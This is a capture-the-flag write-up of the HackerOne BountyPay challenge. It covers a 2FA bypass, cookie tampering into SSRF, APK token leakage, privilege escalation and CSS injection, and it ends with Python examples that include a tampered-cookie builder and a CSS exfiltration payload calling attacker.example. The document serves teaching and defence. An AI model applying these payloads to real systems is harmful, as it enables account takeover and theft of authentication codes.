HackerOne H1-2006 2020 CTF Writeup

by Abdillah Muhamad — on hackerone 01 Jun 2020.

The Big Picture

Given a web application with wildcard scope *.bountypay.h1ctf.com and, as stated on the @Hacker0x01 Twitter account, the goal of the CTF is to help @martenmickos approve the May Bug Bounty payments.

I always perform subdomain enumeration on wildcard targets, and crt.sh always gives most of the results. At this layer the only information we have is that the target has 5 subdomains, so I ran basic enumeration against every one of them (directory, parameter [cookie, POST/GET], header and similar bruteforce).

app.bountypay.h1ctf.com

Directory bruteforce against app.bountypay.h1ctf.com found the request-logger code (https://github.com/bounty-pay-code/request-logger) and the trace file it writes, https://app.bountypay.h1ctf.com/bp_web_trace.log, which is reachable from outside (CWE-538).

After logging in to the brian.oliver account at app.bountypay.h1ctf.com I got a login 2FA prompt, but a quick look at the page source shows a hidden input named challenge, which I guessed at first sight to be the md5 hash of challenge_answer. If we control that hash, we can generate our own md5 as the challenge and send the matching challenge_answer. Generating the hash on the CLI with echo -n 1 | md5sum returns c4ca4238a0b923820dcc509a6f75849b, and this is enough to bypass the 2FA: username=brian.oliver&password=V7h0inzX&challenge=c4ca4238a0b923820dcc509a6f75849b&challenge_answer=1

Bypassing the 2FA gives us the cookie to authenticate as the user. The authenticated user only has two things to try, logout and loading transactions (app.bountypay.h1ctf.com/statements?month=06&year=2020). The logout function has nothing interesting, so I looked deeper into the /statements endpoint. I asked whether the month and year parameters accept anything other than integers; after trial and error I found that they only accept integer values, so I can't do anything with them.

I also decoded the cookie token=eyJhY2NvdW50X2lkIjoiRjhnSGlxU2RwSyIsImhhc2giOiJkZTIzNWJmZmQyM2RmNjk5NWFkNGUwOTMwYmFhYzFhMiJ9, which is base64 of {"account_id":"F8gHiqSdpK","hash":"de235bffd23df6995ad4e0930baac1a2"}. The interesting part is that our account_id is used by the web server to build a new request to api.bountypay.h1ctf.com, and the cookie has no tampering protection, so I was able to modify the account_id and make the server request other API endpoints.

There is also an open redirect on the API: https://api.bountypay.h1ctf.com/redirect?url=https://www.google.com/search?q=REST+API. This endpoint only redirects to whitelisted domains. I spent tons of hours trying to bypass the whitelist, but we don't actually need to: combining the open redirect with the proxied request built from account_id turns it into SSRF (CWE-918, CWE-601, CWE-73). Long story short, https://staff.bountypay.h1ctf.com and https://software.bountypay.h1ctf.com are whitelisted in the redirect, and requesting https://software.bountypay.h1ctf.com through the proxy gave me a login page with the title Software Storage. So with this SSRF and redirect we can reach software that is only meant to be accessible from internal IP addresses.

Thinking of Software Storage, the words "backup files" always come to mind, so I bruteforced directories on the software app through the proxy and found an /uploads folder containing BountyPay.apk, the next challenge: https://software.bountypay.h1ctf.com/uploads/BountyPay.apk

BountyPay.apk

The goal of this APK is to get the value of X-Token so we can hit api.bountypay.h1ctf.com directly; the information leaked from the APK feeds the next step. Reading the AndroidManifest.xml I assumed the challenge has 3 parts, each solvable with a deeplink. I used Intent Launcher to keep the deeplink history and Wifi ADB to connect to my phone without wires.

Opening the application prompts for a username and an (optional) Twitter handle; after submitting it brings you to PartOneActivity, but nothing is visible in the user interface because that part of the code hasn't executed yet. We can make it visible by supplying the right params on the deeplink two://part?two=light&switch=on; we are then prompted for a header value, and we can enter X-Token, a value recovered from base64 in the PartThreeActivity code. Open the third activity with the deeplink three://part?three=UGFydFRocmVlQWN0aXZpdHk=&switch=b24=&header=X-Token (the two base64 values decode to PartThreeActivity and on). The application writes the token to shared_preferences/user_created.xml and to the debug log. Grab the leaked hash 8e9998ee3137ca9ade8f372739f062c1 from user_created.xml and submit it to PartThreeActivity; the debug log then shows the host api.bountypay.h1ctf.com with the header X-Token: 8e9998ee3137ca9ade8f372739f062c1, and that token is valid against the api.bountypay.h1ctf.com endpoints.

api.bountypay.h1ctf.com

Bruteforcing the api.bountypay.h1ctf.com endpoints with the valid X-Token from the Android application found api.bountypay.h1ctf.com/api/staff, a REST resource with GET and POST routes. GET returns the staff_id and name of staff who already have an account; POST expects a staff_id parameter and generates a new account for a staff member who hasn't created one yet. I also found the Twitter account @BountyPayHQ, which is mentioned by @Hacker0x01. @BountyPayHQ announces a new team member, Sandra Allison, and follows her; Sandra posted a picture of her ID card with the staff_id exposed (https://twitter.com/SandraA76708114/status/1258693001964068864). Using Sandra's staff_id (STF:8FJ3KFISL3) on the /api/staff [POST] endpoint gives us staff credentials.

staff.bountypay.h1ctf.com

Using the staff credentials on staff.bountypay.h1ctf.com: the website still uses a base64 cookie, but now it is signed with something, unreadable, and we cannot tamper with it. First I thought the template code was only defined for ?template=login, but I found that we can select multiple templates at once using an array parameter. Reading the JavaScript gave me the clue that an admin has the ability to upgrade a user to admin by sending a GET request; if I had an XSS in the profile name or avatar I could use it to make the admin trigger that upgrade, but the profile name and avatar cannot be turned into an XSS because they only accept [A-Za-z0-9].

A dead end :( I was stuck here quite long, because the attack is very obscure and needs every line of code analyzed. Assuming the bot can only access the ticket, I needed to somehow put the payload on the ticket. Our profile_avatar value is returned inside the class attribute of a tag, so I first added the upgradeToAdmin class; but upgradeToAdmin needs a click trigger, and I saw that the JavaScript has a tab4 class with the ability to trigger a click when #tab4 is sent in the URL. Opening https://staff.bountypay.h1ctf.com/?template[]=login&template[]=ticket&ticket_id=3582&username=sandra.allison#tab4 therefore produces the valid request to upgrade the user to admin. Sending this URL base64-encoded as the report URL to the bot gives us the cookie, and with the admin cookie I can view the martenmickos password.

Payment 2FA

Logging in to the marten account and trying to process the May bug bounty payment requires a 2FA. I tried to extract what is on that page using CSS, trying the most common tags, and found that input[name^=X] worked: the input names are code_1 | code_2 | ... | code_7. So the 2FA code can be extracted with CSS injection; set up your callback and use it. You then need to sort the code to uICTuNw and send it to the 2FA payment challenge to claim your flag: ^FLAG^736c635d8842751b8aafa556154eb9f3$FLAG$

Summary

- Directory bruteforce on app.bountypay.h1ctf.com found the request logger and its externally accessible trace log
- We can access software which is protected only for internal IP addresses by using this SSRF and redirect
- Directory bruteforcing of the software app through the SSRF
- The @BountyPayHQ account was following Sandra, who is new staff there
- Sandra posted a picture with the ID card containing her staff_id
- Generate a staff account using the staff_id via the API
- Modify the avatar classes: .upgradeToAdmin .tab4
- Extract the 2FA code using CSS injection; set up your callback and use it

References

- https://github.com/bounty-pay-code/request-logger
- https://app.bountypay.h1ctf.com/bp_web_trace.log
- https://twitter.com/SandraA76708114/status/1258693001964068864
- CWE-538: Insertion of Sensitive Information into Externally-Accessible File or Directory
- CWE-918: Server-Side Request Forgery (SSRF)
- CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
- CWE-73: External Control of File Name or Path
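The login 2FA bypass above works because the server trusts a hash that the client itself supplies. The following is an added example, not code from the writeup or from the CTF application: it reproduces the self-referential check in a few lines and puts a server-side alternative next to it. The field names challenge and challenge_answer, the md5 relationship and the brian.oliver form values are taken from the writeup; the checker functions, the session store and the single-use policy are my own illustration.

```python
"""Added example: client-controlled 2FA challenge vs. a server-held one."""
import hashlib
import hmac
import secrets


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


# --- what the CTF login effectively did -------------------------------------
def vulnerable_verify(form: dict) -> bool:
    """Trusts the hidden `challenge` field that came back in the POST body.
    Both sides of the comparison are attacker-chosen, so this proves nothing."""
    return md5_hex(form["challenge_answer"]) == form["challenge"]


def attacker_form() -> dict:
    """The bypass request from the writeup: `echo -n 1 | md5sum` gives the
    challenge value, and the matching answer is simply 1."""
    return {
        "username": "brian.oliver",
        "password": "V7h0inzX",
        "challenge": md5_hex("1"),  # c4ca4238a0b923820dcc509a6f75849b
        "challenge_answer": "1",
    }


# --- a fix: the secret never leaves the server (illustrative design) --------
class ServerSideChallenge:
    """Issues a random code per session, stores only it server-side, and
    consumes it on the first verification attempt (success or failure), so
    the client cannot replay or brute-force a single challenge."""

    def __init__(self) -> None:
        self._pending: dict[str, str] = {}  # session_id -> expected answer

    def issue(self, session_id: str) -> None:
        # Zero-padded six digits; only the prompt ("enter your code") is sent.
        self._pending[session_id] = f"{secrets.randbelow(10**6):06d}"

    def verify(self, session_id: str, answer: str) -> bool:
        expected = self._pending.pop(session_id, None)  # single use
        if expected is None:
            return False
        return hmac.compare_digest(expected, answer)


if __name__ == "__main__":
    print("vulnerable check accepts attacker pair:", vulnerable_verify(attacker_form()))
    srv = ServerSideChallenge()
    srv.issue("sess-1")
    print("attacker guess against server-held code:", srv.verify("sess-1", "1"))
```

The point of the hardened class is not the hash function (swapping md5 for sha256 would change nothing here) but where the expected value lives: if the client can see or choose it, the second factor is decorative.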
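The unsigned app cookie above is worth looking at in code, because two separate defects stack: the cookie can be rewritten, and the account_id inside it is interpolated into a server-side request. This is an added example, not the CTF's or the writeup's code. The token value is the real one from the writeup; the upstream URL template, the path-traversal shape of the pivot and the signing key are assumptions (the writeup only says that account_id is used to build a request to api.bountypay.h1ctf.com and that the open redirect made it an SSRF).

```python
"""Added example: decoding, tampering and then properly signing the token cookie."""
import base64
import hashlib
import hmac
import json
import re
from urllib.parse import quote

# Real cookie value from the writeup.
TOKEN = ("eyJhY2NvdW50X2lkIjoiRjhnSGlxU2RwSyIsImhhc2giOiJkZTIzNWJmZmQyM2RmNjk5NWFk"
         "NGUwOTMwYmFhYzFhMiJ9")


def decode_cookie(token: str) -> dict:
    return json.loads(base64.b64decode(token))


def encode_cookie(obj: dict) -> str:
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.b64encode(raw).decode()


# Assumed upstream template; the real path is not on the page.
UPSTREAM = ("https://api.bountypay.h1ctf.com/api/accounts/{account_id}"
            "/statements?month={month}&year={year}")


def build_upstream_url(account_id: str, month: str, year: str) -> str:
    """The vulnerable pattern: a cookie field dropped straight into the URL."""
    return UPSTREAM.format(account_id=account_id, month=month, year=year)


def ssrf_cookie(target: str = "https://software.bountypay.h1ctf.com/") -> str:
    """Assumed pivot: traverse out of the account path to the whitelisted
    /redirect endpoint so the server fetches an internal host for us."""
    tampered = decode_cookie(TOKEN)
    tampered["account_id"] = f"../../redirect?url={target}"
    return encode_cookie(tampered)


# --- hardened side (illustrative) -------------------------------------------
ACCOUNT_ID_RE = re.compile(r"[A-Za-z0-9]{10}")


def build_upstream_url_safe(account_id: str, month: str, year: str) -> str:
    """Allow-list the identifier and force month/year to integers before
    anything reaches the URL; quoting is belt-and-braces after the regex."""
    if not ACCOUNT_ID_RE.fullmatch(account_id):
        raise ValueError("account_id outside allowed alphabet")
    return UPSTREAM.format(account_id=quote(account_id, safe=""),
                           month=int(month), year=int(year))


SIGNING_KEY = b"server-side-secret-change-me"  # assumption


def sign_cookie(obj: dict) -> str:
    token = encode_cookie(obj)
    mac = hmac.new(SIGNING_KEY, token.encode(), hashlib.sha256).hexdigest()
    return f"{token}.{mac}"


def load_signed_cookie(cookie: str):
    """Returns the decoded payload, or None when the MAC does not match."""
    token, _, mac = cookie.rpartition(".")
    expected = hmac.new(SIGNING_KEY, token.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    return decode_cookie(token)


if __name__ == "__main__":
    print(decode_cookie(TOKEN))
    print(build_upstream_url(decode_cookie(ssrf_cookie())["account_id"], "06", "2020"))
```

Signing the cookie alone would already have stopped the tampering, but the allow-list on account_id is the defence that survives a leaked key or a different injection point: an opaque identifier has no business containing slashes or query strings.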
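The CSS-based extraction of the payment 2FA code above is described in one sentence; here is what the payload and the collection side look like. This is an added example, not the writeup's payload. From the writeup: the selector form input[name^=X] matched, the inputs are named code_1 to code_7, and the leaked characters sort to uICTuNw. Assumed: the callback host, leaking through a background-image request, and that each input holds a single character.

```python
"""Added example: CSS attribute-selector exfiltration and reassembly."""
import string
from urllib.parse import parse_qs, urlparse

CALLBACK = "https://attacker.example/leak"  # assumption
ALPHABET = string.ascii_letters + string.digits


def css_payload(n_inputs: int = 7, alphabet: str = ALPHABET,
                prefix: str = "code_") -> str:
    """One rule per (input, candidate character). The browser only fetches
    the background URL for rules whose selector matches, so each fetch tells
    the callback which input starts with which character.

    `[value^=...]` is case-sensitive by default, so 'u' and 'U' are separate
    rules; that matters for a mixed-case code like uICTuNw."""
    rules = []
    for i in range(1, n_inputs + 1):
        for ch in alphabet:
            rules.append(
                f'input[name="{prefix}{i}"][value^="{ch}"]'
                f"{{background:url({CALLBACK}?i={i}&c={ch})}}"
            )
    return "\n".join(rules)


def reassemble(hit_urls: list[str]) -> str:
    """Callback hits arrive in whatever order the browser issues them, so the
    code has to be put back together by input index, not arrival order."""
    chars: dict[int, str] = {}
    for url in hit_urls:
        q = parse_qs(urlparse(url).query)
        idx, ch = int(q["i"][0]), q["c"][0]
        if idx in chars and chars[idx] != ch:
            raise ValueError(f"conflicting leak for index {idx}")
        chars[idx] = ch
    return "".join(chars[i] for i in sorted(chars))


# Constructed callback log (not captured traffic): hits in arrival order.
SAMPLE_HITS = [
    f"{CALLBACK}?i=3&c=C",
    f"{CALLBACK}?i=1&c=u",
    f"{CALLBACK}?i=7&c=w",
    f"{CALLBACK}?i=5&c=u",
    f"{CALLBACK}?i=2&c=I",
    f"{CALLBACK}?i=6&c=N",
    f"{CALLBACK}?i=4&c=T",
]

if __name__ == "__main__":
    print(css_payload().splitlines()[0])
    print(reassemble(SAMPLE_HITS))
```

The prefix selector from the writeup (input[name^=X]) is the discovery step; once the names are known the exact-match form above is less noisy. If an input held more than one character, the same rules would only reveal the first one and a second round with two-character prefixes would be needed.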